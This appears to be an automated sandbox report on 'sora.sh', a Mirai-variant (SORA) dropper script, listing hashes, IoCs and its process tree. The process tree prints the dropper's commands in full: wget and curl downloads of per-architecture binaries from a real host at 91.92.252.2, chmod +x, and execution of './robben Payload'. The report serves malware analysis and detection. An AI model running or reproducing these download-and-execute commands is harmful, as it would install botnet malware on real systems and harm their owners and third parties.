Analysis
-
max time kernel
18s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
03-08-2024 05:14
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
sora.sh
-
Size
2KB
-
MD5
fe9fcc98f0d2d8350fd699bb3edf3419
-
SHA1
5480c071e63cc7dd040b18ebc62c4a3cb7d5b5eb
-
SHA256
faa68fe6ab7972ae17be23f4bed8c482a676935fcf257dca0cc6e51699e16213
-
SHA512
4994f7fc91e833a29b978f9ddd49657554ba0b4cf4c7e3f6d0d956447c45eb876f85e97644481267b58cd0172d471a0e6da89bba9998d14a22ebf499695d054c
Malware Config
Extracted
mirai
SORA
Extracted
mirai
SORA
Signatures
-
Executes dropped EXE 14 IoCs
Processes:
robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenioc pid process /tmp/robben 1512 robben /tmp/robben 1518 robben /tmp/robben 1524 robben /tmp/robben 1530 robben /tmp/robben 1535 robben /tmp/robben 1541 robben /tmp/robben 1547 robben /tmp/robben 1552 robben /tmp/robben 1558 robben /tmp/robben 1564 robben /tmp/robben 1570 robben /tmp/robben 1576 robben /tmp/robben 1581 robben /tmp/robben 1587 robben -
Processes:
resource yara_rule /tmp/robben upx /tmp/robben upx /tmp/robben upx /tmp/robben upx -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlwgetcurlcurlcurlwgetcurlcurlwgetwgetwgetwgetcurlwgetcurlcurlcurlcurlcurlwgetwgetsora.shcurlcurlwgetwgetdescription ioc process File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/robben sora.sh File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.mpsl wget
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:1503 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.x862⤵
- Writes file to tmp directory
PID:1504 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.x862⤵
- Writes file to tmp directory
PID:1509 -
/bin/catcat sora.x862⤵PID:1510
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.sh sora.x86 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1511
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1512 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.mips2⤵
- Writes file to tmp directory
PID:1514 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.mips2⤵
- Writes file to tmp directory
PID:1515 -
/bin/catcat sora.mips2⤵PID:1516
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.mips sora.sh sora.x86 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1517
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1518 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:1520 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:1521 -
/bin/catcat sora.x86_642⤵PID:1522
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.mips sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1523
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1524 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.i4682⤵PID:1526
-
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.i4682⤵
- Writes file to tmp directory
PID:1527 -
/bin/catcat sora.i4682⤵PID:1528
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.i468 sora.mips sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1529
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1530 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.i6862⤵
- Writes file to tmp directory
PID:1531 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.i6862⤵
- Writes file to tmp directory
PID:1532 -
/bin/catcat sora.i6862⤵PID:1533
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1534
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1535 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:1537 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:1538 -
/bin/catcat sora.mpsl2⤵PID:1539
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1540
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1541 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm42⤵PID:1543
-
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm42⤵
- Writes file to tmp directory
PID:1544 -
/bin/catcat sora.arm42⤵PID:1545
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1546
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1547 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm52⤵
- Writes file to tmp directory
PID:1548 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm52⤵
- Writes file to tmp directory
PID:1549 -
/bin/catcat sora.arm52⤵PID:1550
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1551
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1552 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm62⤵
- Writes file to tmp directory
PID:1554 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm62⤵
- Writes file to tmp directory
PID:1555 -
/bin/catcat sora.arm62⤵PID:1556
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1557
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1558 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm72⤵
- Writes file to tmp directory
PID:1560 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm72⤵
- Writes file to tmp directory
PID:1561 -
/bin/catcat sora.arm72⤵PID:1562
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1563
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1564 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:1566 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:1567 -
/bin/catcat sora.ppc2⤵PID:1568
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1569
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1570 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.ppc440fp2⤵PID:1572
-
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.ppc440fp2⤵
- Writes file to tmp directory
PID:1573 -
/bin/catcat sora.ppc440fp2⤵PID:1574
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1575
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1576 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:1577 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:1578 -
/bin/catcat sora.m68k2⤵PID:1579
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1580
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1581 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.sh42⤵
- Writes file to tmp directory
PID:1583 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.sh42⤵
- Writes file to tmp directory
PID:1584 -
/bin/catcat sora.sh42⤵PID:1585
-
/bin/chmodchmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.sh4 sora.x86 sora.x86_64 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv02⤵PID:1586
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:1587
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD5545cc0b3e5dae8244debe55a41e14a9f
SHA1101ad459b5b114c0a79c458cd0c0d2374a3698a1
SHA256a916866d96e7215899fb4387c14b52725ec83de463dd0302c8cc72b8cade2d91
SHA5121e90d63777c07e490540fe00f41a2f50d157c0e2b7c979204e8fc5a9775cbdd21a7e317290c82c552897cdb30320a08d1ca705e33e1d947e837ff14e6ca56611
-
Filesize
28KB
MD58d068eba527935d34fbff880f4cf7530
SHA182f50f55fb025735b62fca14362600132b21c2d0
SHA256bce45bca1f30fecce6ce8bf4c4dfcc1c9c19517144398aa91b9a63c01995c147
SHA5126cc29217a507b4072469b11f63a8da070a70e4228a36a0ea612f905789ca0f829c47bd290d9c09024bfe88c7e28fff8d430e9e9def5a6124b90cedb49f029c14
-
Filesize
28KB
MD5fa8042bc292cb4403494d779833de7ca
SHA1a78431e9ef2fac7f3a909c06a81e643369a17ee4
SHA2561ec5ec93f91f140dbdfbb8a3f79828be32737673e60b6b8999d3a5c520a1b5f5
SHA512fe9e309c7b18a1c25d10d418cea499a1385f4c227fb5a64e491b1ca3d5819a5677f80280194b4dcc2aa7cc69aa6b7c1775a3cd54143f45aed0dc0ddcb199de82
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5a9d839dd97abb474595bc7e18157aa64
SHA182c1ec7eae6dd1bc7dcfd1e89911d328c899c885
SHA2563bb3ff14162d0b66a51f448e8ff9e9018aa0040941de829f8748911b4471d90d
SHA5124311ce9b061bf6f01b3b004eb0c0b14a4fb86b1a11c040fd8b633c3a3a27821c74775a4eeec82d22e8eacddbc35736814800dcf9dbca85218f189fda4b1d8993
-
Filesize
64KB
MD55092e7b4c0b2e9e418ca596ddad29165
SHA141edb1d01dcd2bacfd437cad4af32791e473e1c0
SHA25643c3fe213b5a161348b2036c0bdf95b5c72d48d55ed3e2557a91a078de5bb845
SHA512d4004f22ad4142cef16dd5dea79598b69b94667dac47affaee45f7a16c64ee859654930315d1cec9aaf374f1d62a1c34239f8a8b42f41855f353ffd6d773e742